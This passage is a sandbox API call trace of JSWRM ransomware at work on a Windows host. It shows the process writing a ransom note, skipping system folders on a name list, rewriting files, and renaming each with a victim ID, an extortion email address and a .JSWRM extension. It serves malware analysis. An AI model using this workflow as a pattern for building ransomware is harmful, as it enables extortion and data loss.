(lpFileName="C:\\588bce7c90097ed212\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1036\\jswrm-decrypt.hta")) returned 0xffffffff [0059.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0059.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.136] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.136] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.136] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0059.137] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.137] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0059.137] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1036\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.138] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.138] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.139] CloseHandle (hObject=0x450) returned 1 [0059.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.139] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.139] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0059.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.140] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1036\\jswrm-decrypt.hta")) returned 0x20 [0059.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0059.140] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.140] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19e8313e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0059.140] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.140] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19e8313e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.140] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.140] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.140] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.140] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.140] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0059.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.141] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0059.141] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.141] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.142] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0059.142] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.142] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3526) returned 1 [0059.142] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.142] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xdc0) returned 0x23dc88 [0059.142] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xdc0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xdc0, lpOverlapped=0x0) returned 1 [0059.143] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.143] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xdc0, lpOverlapped=0x0) returned 1 [0059.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.144] CloseHandle (hObject=0x3d4) returned 1 [0059.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.144] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.144] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.144] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0059.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0059.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0059.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0059.145] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.145] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1036\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.145] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0059.145] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19e8313e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19e8313e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19e8313e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.145] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.146] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.146] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.146] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.146] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0059.146] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.146] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0059.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.147] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.147] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=82962) returned 1 [0059.147] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14410) returned 0x2471a8 [0059.147] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x14410, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x14410, lpOverlapped=0x0) returned 1 [0059.154] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.154] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x14410, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x14410, lpOverlapped=0x0) returned 1 [0059.155] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.156] CloseHandle (hObject=0x3d4) returned 1 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0059.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0059.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0059.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.158] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0059.158] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.158] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0059.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.159] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.159] lstrcmpiW 